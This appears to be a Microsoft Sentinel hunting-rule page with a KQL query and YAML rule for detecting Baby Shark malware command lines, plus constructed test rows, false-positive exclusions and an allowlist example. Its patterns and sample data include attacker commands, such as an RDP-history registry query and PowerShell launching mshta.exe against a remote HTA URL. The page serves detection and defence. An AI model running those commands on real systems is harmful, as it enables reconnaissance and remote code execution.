This hunting query looks for three process command lines that the referenced Sigma rule associates with the Baby Shark malware: a `reg query` of the current user's `Terminal Server Client\Default` key (the list of hosts recently reached over RDP), PowerShell launching `mshta.exe` against an HTTP URL, and `cmd.exe /c taskkill /im cmd.exe`. Each of these is built-in Windows tooling, so the activity is unlikely to trip signature-based controls on its own. SOC teams should hunt for these command lines in Azure Sentinel (now Microsoft Sentinel) over the DeviceProcessEvents table; two or more of them on the same device within a short window is a much stronger signal than any single hit.
KQL Query
```kql
DeviceProcessEvents
| where Timestamp > ago(7d)
// =~ is case-insensitive equality on the whole command line; the @"..." verbatim
// literal keeps the backslashes and the doubled "" are literal quotes.
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
    // startswith only matches when the image is logged as the bare name, not a full path
    or ProcessCommandLine startswith "powershell.exe mshta.exe http"
    or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| top 100 by Timestamp desc
```
```yaml
id: 26721b80-a9b7-4594-9b0f-ec21e5da1bc2
name: APT Baby Shark
description: |
  Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml.
  Questions via Twitter: @janvonkirchheim.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where Timestamp > ago(7d)
  | where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
      or ProcessCommandLine startswith "powershell.exe mshta.exe http"
      or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
  | top 100 by Timestamp desc
```
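To see what the rule does and does not catch, the following added example (not part of the original hunting query or the Sigma rule) runs the page's three clauses over a handful of constructed DeviceProcessEvents rows built with `datatable`, so it can be pasted into any Log Analytics or Data Explorer query window without the connector. The device names, accounts, timestamps and the 203.0.113.10 URL are invented test data; the `ago(7d)` window is dropped because the sample timestamps are fixed. Beside the exact-match logic it adds a looser term-based variant (an assumption of this example, not something the page prescribes) to show which rows the exact strings miss.

```kql
// Constructed sample rows mirroring the DeviceProcessEvents columns used here.
let SampleEvents = datatable(
    Timestamp: datetime,
    DeviceName: string,
    AccountName: string,
    FileName: string,
    ProcessCommandLine: string,
    InitiatingProcessFileName: string
)[
    // 1. Literal Baby Shark-style registry query: exact match
    datetime(2024-05-01 10:00:00), "ws01", "jdoe", "reg.exe",
        @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default""", "cmd.exe",
    // 2. Same intent, HKCU abbreviation and different casing: exact match misses it
    datetime(2024-05-01 10:00:05), "ws01", "jdoe", "reg.exe",
        @"REG QUERY HKCU\Software\Microsoft\Terminal Server Client\Default", "cmd.exe",
    // 3. PowerShell launching mshta with a URL, bare image name: exact match
    datetime(2024-05-01 10:01:00), "ws01", "jdoe", "powershell.exe",
        "powershell.exe mshta.exe http://203.0.113.10/x.hta", "wscript.exe",
    // 4. Same, but logged with the full image path: startswith misses it
    datetime(2024-05-01 10:01:10), "ws02", "asmith", "powershell.exe",
        @"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" mshta.exe http://203.0.113.10/x.hta", "wscript.exe",
    // 5. Self-terminating cmd: exact match
    datetime(2024-05-01 10:02:00), "ws02", "asmith", "cmd.exe",
        "cmd.exe /c taskkill /im cmd.exe", "wscript.exe",
    // 6. Ordinary admin registry query: must not match either variant
    datetime(2024-05-01 10:03:00), "ws03", "helpdesk", "reg.exe",
        @"reg query HKLM\SYSTEM\CurrentControlSet\Services", "cmd.exe"
];
// The page's hunting logic, unchanged apart from the source table and time filter.
let Exact = SampleEvents
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
    or ProcessCommandLine startswith "powershell.exe mshta.exe http"
    or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| extend Matched = "exact";
// Looser variant: match on whole terms (case-insensitive) instead of the full
// string, so image paths, HKCU vs HKEY_CURRENT_USER and casing do not hide it.
let Loose = SampleEvents
| where ProcessCommandLine has_all ("reg", "query", "Terminal", "Server", "Client", "Default")
    or (FileName =~ "powershell.exe" and ProcessCommandLine has "mshta" and ProcessCommandLine has "http")
    or ProcessCommandLine has_all ("taskkill", "cmd")
| extend Matched = "loose";
// Rows 1, 3 and 5 come back as ["exact","loose"]; rows 2 and 4 only as ["loose"];
// row 6 is absent.
Exact
| union Loose
| summarize Matched = make_set(Matched) by Timestamp, DeviceName, AccountName, ProcessCommandLine
| order by Timestamp asc
```

The looser clauses trade precision for recall, so expect more benign hits from them; the exclusions in the false-positive scenarios below apply to either form. Swap `SampleEvents` for `DeviceProcessEvents` and restore the `Timestamp > ago(7d)` filter to run it against live data.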
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled; the table is populated by the MicrosoftThreatProtection (Microsoft 365 Defender) connector listed in the YAML above |
Scenario: Helpdesk Troubleshooting RDP Connection History
Description: A support technician or administrator runs `reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"` from an interactive cmd.exe to see which hosts a user has recently connected to over RDP. The command line is identical to the first clause of the query.
Filter/Exclusion: Exclude only the combination of a known support host, a support account and an interactive parent shell, never the account alone, for example `| where not(DeviceName in ("<jump-host>") and AccountName in ("<support-account>") and InitiatingProcessFileName =~ "cmd.exe")` (placeholder names).
Scenario: Inventory or Compliance Script Enumerating RDP History
Description: A scheduled inventory script collects the same registry key from every workstation, so the query fires on many devices at the same time under a service account.
Filter/Exclusion: Key the exclusion on the parent process rather than the command line, for example `| where not(InitiatingProcessCommandLine has "<inventory-script>.ps1" and AccountName =~ "<service-account>")` (placeholders), and confirm the script's contents and location before adding it.
Scenario: Admin Launching an HTA-Based Tool from PowerShell
Description: A PowerShell wrapper starts mshta.exe with an internal http(s) URL to open an HTML Application used as an admin console, matching the second clause of the query.
Filter/Exclusion: Exclude only known internal URLs, for example `| where not(ProcessCommandLine has "mshta" and ProcessCommandLine has "http://<intranet-host>/")` (placeholder host). Keep every mshta launch that points at an external or IP-address URL in the results.
Scenario: Legacy Batch File That Ends by Killing cmd.exe
Description: An old installer or logon script finishes with `cmd.exe /c taskkill /im cmd.exe` as a crude way of closing its own console window, matching the third clause of the query.
Filter/Exclusion: Exclude by the script's parent process and location, for example `| where not(InitiatingProcessFileName =~ "cmd.exe" and InitiatingProcessCommandLine has "<legacy-script>.bat")` (placeholder), or by the script's folder via `InitiatingProcessFolderPath`. Do not exclude the taskkill clause outright, since it is the weakest of the three on its own and mainly matters when it follows one of the other two on the same device.
Scenario: Purple-Team Validation of This Rule
Description: The security team replays the three command lines on a test device to confirm the hunting query fires, producing a cluster of hits from a single account in a short window.
Filter/Exclusion: Exclude the test devices for the test window only, for example `| where DeviceName !in ("<test-device>")` (placeholder), and record the exercise in a ticket rather than leaving a permanent exclusion in place.
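Putting the exclusions above into practice, the following added example (not part of the original page) applies a narrow allowlist of reviewed account-plus-parent-process pairs with a `leftanti` join, labels which of the three clauses each surviving hit corresponds to, and ranks devices by how many of the stages fired. The hit rows are constructed test data and the allowlist entries are placeholders; the stage labels are this example's own naming, not terms from the Sigma rule.

```kql
// Constructed rows shaped like the output of the hunting query above.
let Hits = datatable(
    Timestamp: datetime,
    DeviceName: string,
    AccountName: string,
    InitiatingProcessFileName: string,
    ProcessCommandLine: string
)[
    // Reviewed helpdesk use from a jump host: should be excluded
    datetime(2024-05-01 09:00:00), "jump01", "helpdesk1", "cmd.exe",
        @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default""",
    // All three clauses on one workstation, spawned by a script host, within a minute
    datetime(2024-05-01 10:00:00), "ws07", "jdoe", "wscript.exe",
        @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default""",
    datetime(2024-05-01 10:00:30), "ws07", "jdoe", "wscript.exe",
        "powershell.exe mshta.exe http://203.0.113.10/x.hta",
    datetime(2024-05-01 10:01:00), "ws07", "jdoe", "wscript.exe",
        "cmd.exe /c taskkill /im cmd.exe",
    // Legacy build script cleanup under a service account: should be excluded
    datetime(2024-05-01 11:00:00), "build02", "svc_build", "cmd.exe",
        "cmd.exe /c taskkill /im cmd.exe"
];
// Placeholder allowlist: account + parent-process pairs whose use of these
// commands has been reviewed. Never allowlist on AccountName alone.
let Allowlist = datatable(AccountName: string, InitiatingProcessFileName: string)[
    "helpdesk1", "cmd.exe",
    "svc_build", "cmd.exe"
];
Hits
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
    or ProcessCommandLine startswith "powershell.exe mshta.exe http"
    or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
// leftanti keeps only rows with no matching allowlist entry.
| join kind=leftanti Allowlist on AccountName, InitiatingProcessFileName
// Label each clause so the summary shows which stages fired per device.
| extend Stage = case(
    ProcessCommandLine has "Terminal", "rdp_history_recon",
    ProcessCommandLine has "mshta", "mshta_download",
    ProcessCommandLine has "taskkill", "cmd_cleanup",
    "other")
| summarize Stages = make_set(Stage),
            FirstSeen = min(Timestamp),
            LastSeen = max(Timestamp),
            Parents = make_set(InitiatingProcessFileName)
    by DeviceName, AccountName
| extend StageCount = array_length(Stages)
// Result: one row, ws07 / jdoe with StageCount 3 and Parents ["wscript.exe"];
// the jump01 and build02 rows are removed by the allowlist.
| order by StageCount desc, FirstSeen asc
```

Ranking by `StageCount` puts the host that shows the full sequence at the top, while a single reviewed hit from an allowlisted pair never reaches the analyst; anything not on the allowlist, including a lone hit from an unfamiliar parent process, still appears with `StageCount` 1 for triage.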